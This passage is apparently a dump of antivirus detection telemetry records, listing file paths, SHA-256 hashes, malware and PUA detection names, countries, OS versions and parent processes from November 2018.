  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='8bc02e467dd9d260328f23b822e47ad7cfcb39d072d1a477540732be0b689f2b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f63a35fdaa330db8c95a8702c31b2a4ee0f457c0ae00fdd4bed7e90c101caa91', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:XxL4llJpZ0C2fM+8.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T04:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E4EED58AE227AB614046E0EE176D4E2CB147BEFFA11BCA7D2B97DC07B17D2AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lhh5acsrxwr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074808-a264da4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-074808-A264DA4B', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161429-1af9dd27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3cde752e\\AVSCAN-20181102-161342-1423446C\\AVSCAN-20181102-161429-1AF9DD27', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000071c4', filepath='C:\\Windows\\Temp\\tmp00000176\\tmp000071c4', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='e6c299a089b474b2eb4153b6a6d101d128dbc397eecf1396966877111a192d9d', metadata=Row(cmdline='\\\\\\/service', country='LV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Managed Antivirus\\Managed Antivirus Engine\\Telia Lietuva, AB\\Bitdefender\\EndpointService.exe', parentsize=411576, timestamp='2018-11-02T10:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kmpct2kk.exe', filepath='e:\\new folder\\kxdriver_ccd_clp_20141029\\kxdriver\\utility\\configtool\\KMPCT2KK.exe', filesize=832000, name='W32/Neshta.A.#M1.#R1'), hash='c64e49979f518a45ca7dc15a08e4591c6f00370e32b54bd30a3423e3b6f840a5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:46:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\1a3py5fa4ue\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:43:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='90d5d54a42d25213105034790875ad1d074f2b60424fc844f819963b7e6a590d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T08:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D41CC0D5F8B97B9ABDFD6CA61B10F159868BFAB17F7E1D94FB1A10ACD69E052', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e8f0861c746d185964576a57a9171c1a7f8fb0ccd7be28e1968cf8a66418ed5b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\E8F0861C746D185964576A57A9171C1A7F8FB0CCD7BE28E1968CF8A66418ED5B', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='e8f0861c746d185964576a57a9171c1a7f8fb0ccd7be28e1968cf8a66418ed5b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nss6A67.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T13:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220426-65dd0d17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e771462\\AVSCAN-20181102-220403-60E38ADE\\AVSCAN-20181102-220426-65DD0D17', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205133-1fe58748', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-205133-1FE58748', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='b12b35f4f36cf6350b6211411529eedad120eb8b56e60c74a0a77b57c508f375', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:52:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-204418-6df776eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204418-6DF776EB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bnsxcda2.exe', filepath='c:\\users\\X\\appdata\\local\\ef432080-1430173224-1452-bff1-a7a2cfeff041\\bnsxcda2.exe', filesize=192000, name='APPL/RedCap.d6a4f9.#M1.#R1'), hash='d6a4f91036b4cad586ba56cf847f8851a2ce6b3ff9ca5babf4c3c1a761367e4b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\runonce.exe', parentsize=47616, timestamp='2018-11-04T23:30:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-112026-c0bcd1f0', filepath='C:\\Documents and Settings\\X\\Dati applicazioni\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-112006-5AE32748\\AVSCAN-20181104-112026-C0BCD1F0', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:20:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294c9c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294c9c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:48:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297b74', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297b74', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:55:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140302-f4942b5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140302-F4942B5D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002940b5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002940b5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:35:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ccc1f5845bd9dd99ec37a2f679617712d32e1d4db090546cd37c91cca55624ec', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:50:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202429-cf3685d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202429-CF3685D2', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237cc0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237cc0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:13:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290e30', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290e30', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:42:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='D:\\cs\\cs16v2017_oyunyoneticisi\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='e30f3d27fd2b91cd7e41e29b2e6b9fd7ef4a163eb88a8dab8a00803d6d91ea34', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:58:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='de4aca49c68fad604d447cee5fb9f451e831c2dd1aa340d8f3229526c641065d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DE4ACA49C68FAD604D447CEE5FB9F451E831C2DD1AA340D8F3229526C641065D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de4aca49c68fad604d447cee5fb9f451e831c2dd1aa340d8f3229526c641065d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:14:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:59:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f96dd5657288d7f96f2d44cc0fb478c7dd96bbd2868e2f61c034cad0ba342e83', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F96DD5657288D7F96F2D44CC0FB478C7DD96BBD2868E2F61C034CAD0BA342E83', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f96dd5657288d7f96f2d44cc0fb478c7dd96bbd2868e2f61c034cad0ba342e83', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:47Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9942144\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3725640, timestamp='2018-11-02T02:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155918-e8affd70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155918-E8AFFD70', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013735-3424f796', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-013735-3424F796', filesize=296000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='20cae32feda0d42f0a8e9ed811ceb5e43e8474eecfc3afb052811a383f21d2f4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup(1).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\wspsetup(1).exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:59:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe136_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe136 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T19:00:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1CB6DF2BF5442042F20DFA273E9C2C75AC04DC98852235F9CCB77FD7ECA3EDDF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172722-d3b844fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-172713-D2144126\\AVSCAN-20181102-172722-D3B844FE', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:27:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:59:34Z'), dt=datetime.date(2018, 11, 2)),
